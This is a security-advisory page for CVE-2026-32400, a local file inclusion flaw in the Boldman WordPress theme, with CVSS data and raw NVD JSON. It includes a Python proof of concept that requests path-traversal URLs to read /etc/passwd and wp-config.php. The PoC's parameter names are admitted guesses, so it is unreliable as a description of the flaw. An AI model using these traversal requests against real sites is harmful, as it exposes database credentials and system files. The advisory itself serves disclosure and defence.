Security Vulnerability Report
中文
CVE-2026-32400 CVSS 7.5 HIGH

CVE-2026-32400

Published: 2026-03-13 19:54:56
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemetechMount Boldman boldman allows PHP Local File Inclusion.This issue affects Boldman: from n/a through <= 7.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Boldman主题 <= 7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32400 Boldman Theme LFI PoC # Target: WordPress site using Boldman theme <= 7.7 target_url = "http://target-site.com/wp-content/themes/boldman/" # Vulnerable parameter example (actual parameter varies based on theme version) vulnerable_params = [ "?theme_path=../../../../../../etc/passwd", "?page=../../../../../../wp-config.php", "?module=../../../../../../etc/hostname" ] for param in vulnerable_params: url = target_url + "includes/file.php" + param print(f"[*] Testing: {url}") try: response = requests.get(url, timeout=10) if response.status_code == 200: if "root:" in response.text or "DB_NAME" in response.text: print(f"[!] Vulnerability confirmed! File contents:") print(response.text[:500]) except requests.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32400", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:55.963", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemetechMount Boldman boldman allows PHP Local File Inclusion.This issue affects Boldman: from n/a through <= 7.7."}, {"lang": "es", "value": "La vulnerabilidad 'Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP' ('inclusión remota de ficheros PHP') en ThemetechMount Boldman boldman permite inclusión local de ficheros PHP. Este problema afecta a Boldman: desde n/a hasta &lt;= 7.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/boldman/vulnerability/wordpress-boldman-theme-7-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}